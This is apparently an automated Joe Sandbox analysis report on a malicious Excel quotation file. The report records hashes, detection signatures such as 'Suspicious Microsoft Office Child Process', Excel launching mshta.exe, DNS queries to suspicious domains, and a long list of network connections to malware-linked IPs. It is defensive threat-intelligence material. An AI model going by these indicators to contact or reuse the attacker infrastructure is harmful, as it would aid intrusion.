Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
COTA#U00c7#U00c3O.xls

Overview

General Information

Sample name:COTA#U00c7#U00c3O.xls
renamed because original name is a hash value
Original sample name:COTAO.xls
Analysis ID:1634262
MD5:3f6b0fddaa94e07440a3890afc3dc99c
SHA1:2c963eb3944bc4be5892e6ef95283e2b8b9bcaf1
SHA256:d4819f6ce1e7c5ed703e11e3ae98ebfb04abe95ac2a221bcc43696de923bdbb2
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 6832 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7640 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7720 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 7876 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\COTA#U00c7#U00c3O.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6832, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7640, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 5.161.200.29, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6832, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49700
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.8, DestinationIsIpv6: false, DestinationPort: 49700, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6832, Protocol: tcp, SourceIp: 5.161.200.29, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-10T21:34:36.141524+010020283713Unknown Traffic192.168.2.84970413.107.246.67443TCP
2025-03-10T21:34:42.978888+010020283713Unknown Traffic192.168.2.84970613.107.246.67443TCP
2025-03-10T21:34:43.343525+010020283713Unknown Traffic192.168.2.84970513.107.246.67443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: COTA#U00c7#U00c3O.xlsVirustotal: Detection: 25%Perma Link
Source: COTA#U00c7#U00c3O.xlsReversingLabs: Detection: 21%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 5.161.200.29:443 -> 192.168.2.8:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.39.89.152:443 -> 192.168.2.8:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.8:49704 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: st3.pro
Source: global trafficDNS query: name: link.saja.market
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.8:49700 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.8:49700
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.8:49702 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.8:49702
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.8:49703
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49703 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
Source: global trafficTCP traffic: 192.168.2.8:49704 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.8:49704
